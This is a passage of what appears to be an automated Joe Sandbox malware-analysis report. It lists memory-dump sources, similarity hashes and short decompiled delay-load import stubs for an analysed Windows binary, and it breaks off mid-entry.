                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 0988e6b3d9dd8e77fcfb4430a3ecfa48666c427fbb5ee0e3debfc8c4914889f8
                • Instruction ID: eed9895f7ff26ac0f37ecbbe58c6e65dfb01da9d11a5c3b6ff35f78633717408
                • Opcode Fuzzy Hash: 0988e6b3d9dd8e77fcfb4430a3ecfa48666c427fbb5ee0e3debfc8c4914889f8
                • Instruction Fuzzy Hash: D5B012E52580A0FC350956475C02D37011CC0C4F12330833FF815C44C0E9586D440435
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE232() {
                
                				E003EE85D(0x40c5ec, 0x433144); // executed
                				goto __eax;
                			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: b15b1604627994caaa5df4d7a3381da24e29ba684bd63653899792d33aa759fa
                • Instruction ID: 07b3cfff507fa3584ebf830432caa650811ed963e7c92985caae1409b17df72a
                • Opcode Fuzzy Hash: b15b1604627994caaa5df4d7a3381da24e29ba684bd63653899792d33aa759fa
                • Instruction Fuzzy Hash: 7CB012E52580A0FC350956475D02D37011CC0C4F12330833FF815C44C0ED546E851435
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE228() {
                
                				E003EE85D(0x40c5ec, 0x433148); // executed
                				goto __eax;
                			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 27631940c58a56c103dd1038fbef1ebd27318b1e7d219e3ecb3d75eaf9f96ed2
                • Instruction ID: c184a067abd3f0840e1461bf7748a87e5adb1699bad03383c357a12cd5b2f0b5
                • Opcode Fuzzy Hash: 27631940c58a56c103dd1038fbef1ebd27318b1e7d219e3ecb3d75eaf9f96ed2
                • Instruction Fuzzy Hash: 86B012E52581A0FC354956475C02D37011CC0C4F13330833FF815C44C0E9946D840435
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE21E() {
                
                				E003EE85D(0x40c5ec, 0x43314c); // executed
                				goto __eax;
                			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 3ac255b6c0223a86ab705d886770332547508760f7b20867ded01204dd0b425f
                • Instruction ID: 7703d46d7bf89ee81423973d1317a906debb2eb2f13bdefe9bd431f22a566ee6
                • Opcode Fuzzy Hash: 3ac255b6c0223a86ab705d886770332547508760f7b20867ded01204dd0b425f
                • Instruction Fuzzy Hash: 6AB012E52580A0FC350956475C02D37011CC0C5F12330C33FFC15C44C0E954AD440435
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE20A() {
                
                				E003EE85D(0x40c5ec, 0x433154); // executed
                				goto __eax;
                			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 2ffac27221eeb98db410bc0ec9442a7c882f6aebe8abd7eac47d2dafcfbae329
                • Instruction ID: c2f67123907e137afcb7baba0d36ae1dd39ac5c5de24c1e53473b742042c290b
                • Opcode Fuzzy Hash: 2ffac27221eeb98db410bc0ec9442a7c882f6aebe8abd7eac47d2dafcfbae329
                • Instruction Fuzzy Hash: F3B012D52580A0FC350953475D02D37010CC0C4F12330C33FF815C45C0ED646D8D1835
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE200() {
                
                				E003EE85D(0x40c5ec, 0x433158); // executed
                				goto __eax;
                			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: f24982257986db0948bf4e9d09c4dbd67817ae45b3a62028eb91a823e541d4de
                • Instruction ID: 331105994ab2cf4b0c7b44c5165c0f2c2659e03c13f6e40fb5330d4a103effcf
                • Opcode Fuzzy Hash: f24982257986db0948bf4e9d09c4dbd67817ae45b3a62028eb91a823e541d4de
                • Instruction Fuzzy Hash: 31B092952581A0FC354952465C02D36010CC084B12330833BB815C45C0A99468880835
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE26E() {
                
                				E003EE85D(0x40c5ec, 0x43312c); // executed
                				goto __eax;
                			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 475c652057be0ae1001eb58894f8b7a955c184ae34639914ceee6b915cf60e7b
                • Instruction ID: d295730dba23c21275dcf0a2db5b711db9007c8d04e9a4f3fac9920e07357343
                • Opcode Fuzzy Hash: 475c652057be0ae1001eb58894f8b7a955c184ae34639914ceee6b915cf60e7b
                • Instruction Fuzzy Hash: 34B012D52580A0FC350992575C02D37014CC0C5F12330C33FFC15C44C0EA54AC440435
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE264() {
                
                				E003EE85D(0x40c5ec, 0x433130); // executed
                				goto __eax;
                			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 9b874b5285ac27dfc90e83af6d034af46fdaa9d616534141e3806b7cd071353a
                • Instruction ID: 0b0559f6a1456dc7aedeba3ca825462458cc125d786be1494a1cb116d4a5e39e
                • Opcode Fuzzy Hash: 9b874b5285ac27dfc90e83af6d034af46fdaa9d616534141e3806b7cd071353a
                • Instruction Fuzzy Hash: F5B012D52690E0FC350952475C02D3B014DC4C4F22730833FF856C44C0E9586C440435
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE250() {
                
                				E003EE85D(0x40c5ec, 0x433138); // executed
                				goto __eax;
                			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: b23585c38576cb76ce1b2e876dbec42d685877966fb31fd2c6f58f316d893e17
                • Instruction ID: d07e74df769fed7175a2478e888ca2810fe487e280eeb7d1bed2bff15fe07575
                • Opcode Fuzzy Hash: b23585c38576cb76ce1b2e876dbec42d685877966fb31fd2c6f58f316d893e17
                • Instruction Fuzzy Hash: 31B012E52591E0FC354953475C02D3B010DC0C4F23730833FF815C44C0E9946C880435
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE246() {
                
                				E003EE85D(0x40c5ec, 0x43313c); // executed
                				goto __eax;
                			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: f3cbcd868b627b26892f76331d0bea749a550011320cf4a1d87482b9141e57fc
                • Instruction ID: b000bc120d446e016872298f05d2f1d1a3067c36cd55d19e703a877f1a83f7e4
                • Opcode Fuzzy Hash: f3cbcd868b627b26892f76331d0bea749a550011320cf4a1d87482b9141e57fc
                • Instruction Fuzzy Hash: 44B012D53590E0FC350952475C02D3B010DC0C5F22730C33FFC15C44C0E954AC440435
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE2B4() {
                
                				E003EE85D(0x40c5ec, 0x433110); // executed
                				goto __eax;
                			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: f5d5fd9badcdbf2a3bc29bb1cc9e4f0ce265cedb47caf3a2bebd87dbae27fd7d
                • Instruction ID: bd7af923b2ff592c0b2fb4196e3aea01e2221d3de3e8b0923846f611d22f744d
                • Opcode Fuzzy Hash: f5d5fd9badcdbf2a3bc29bb1cc9e4f0ce265cedb47caf3a2bebd87dbae27fd7d
                • Instruction Fuzzy Hash: 2CB012D56580A0FC350952475C03D37020CC0C4F12330873FF825C44C1E9586C440435
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE282() {
                
                				E003EE85D(0x40c5ec, 0x433124); // executed
                				goto __eax;
                			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: d07e26b15463d528af6f0e30f9bbef0aabc592ae591e59127eef9bdf5066c3ff
                • Instruction ID: 9f74c634d8f52523dc4a59f238d2249757afd69870efde98e9a376940dba381a
                • Opcode Fuzzy Hash: d07e26b15463d528af6f0e30f9bbef0aabc592ae591e59127eef9bdf5066c3ff
                • Instruction Fuzzy Hash: 4EB012E52580A0FC350992475D02D37018CC0C4F12730833FF815C44C0EE546D851435
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE532() {
                
                				E003EE85D(0x40c66c, 0x433080); // executed
                				goto __eax;
                			}



                0x003ee51f
                0x003ee526

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 2>
                • API String ID: 1269201914-3453434342
                • Opcode ID: 61e680a869cd2c360adc582f1415c8f1dc17eda5c20cd2e3b23d0c7f5406894c
                • Instruction ID: 29f587d8e90a6d9dd928ce0699f8af89ede3d9c48b22857d9fbc118195301f86
                • Opcode Fuzzy Hash: 61e680a869cd2c360adc582f1415c8f1dc17eda5c20cd2e3b23d0c7f5406894c
                • Instruction Fuzzy Hash: 5CB012C5258590BD7109521A1D02E3B011CC0C6F11730973FF414C84C0E9484C040435
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE50D() {
                
                				E003EE85D(0x40c66c, 0x433090); // executed
                				goto __eax;
                			}



                0x003ee51f
                0x003ee526

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 2>
                • API String ID: 1269201914-3453434342
                • Opcode ID: 150c6d71d1250d175b583336327c97362ca77812d2e1153ac838c333a66841e3
                • Instruction ID: 2e7914750855b962eea4cad700166b0ea8804292d670c96c5df12a4c6829cb67
                • Opcode Fuzzy Hash: 150c6d71d1250d175b583336327c97362ca77812d2e1153ac838c333a66841e3
                • Instruction Fuzzy Hash: 95B012C5258490BC710912361D06D3B011CC0C2F15B30973FF460D48C1A9484D080435
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE546() {
                
                				E003EE85D(0x40c66c, 0x433078); // executed
                				goto __eax;
                			}



                0x003ee51f
                0x003ee526

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 2>
                • API String ID: 1269201914-3453434342
                • Opcode ID: 476f4a020e4b6613e2cb514f157f317ecd0dbf5c7342b7a89ab4fafee602dcd4
                • Instruction ID: 83a6ea68640d940c44406c3dea90bf5ad557208a1384f2dbc700e26fd0ff60fd
                • Opcode Fuzzy Hash: 476f4a020e4b6613e2cb514f157f317ecd0dbf5c7342b7a89ab4fafee602dcd4
                • Instruction Fuzzy Hash: E3B012C5258590BC7209521A5C43D3B011CC0C6F12730973FF414C44C0E9444C480439
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: f460464b3a2da5bac48712a87f07d225ff5243cdf55647d96c48094eb0c76639
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
